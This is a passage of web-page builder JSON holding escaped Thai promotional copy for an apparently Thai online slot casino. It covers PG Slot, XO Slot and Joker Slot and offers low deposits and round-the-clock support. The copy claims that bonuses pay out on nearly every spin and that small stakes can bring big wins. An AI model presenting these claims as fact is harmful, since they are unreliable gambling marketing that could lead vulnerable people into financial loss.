\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a Line Official \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\n\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e21\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e17\\u0e35\\u0e48\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22\\u0e08\\u0e19\\u0e16\\u0e39\\u0e01\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e27\\u0e48\\u0e32 \\u201c\\u0e04\\u0e48\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e0a\\u0e04\\u201d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2e\\u0e34\\u0e15\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07 Roma, Supreme Caishen \\u0e2b\\u0e23\\u0e37\\u0e2d Lucky Panda \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e21\\u0e35\\u0e40\\u0e2d\\u0e01\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e20\\u0e32\\u0e1e \\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07 \\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e19\\u0e27\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e25\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e01\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e15\\u0e49\\u0e2d\\u0e07 XO Slot \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>Joker Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c \\u0e41\\u0e15\\u0e01\\u0e41\\u0e23\\u0e07 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e38\\u0e01\\u0e41\\u0e19\\u0e27 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 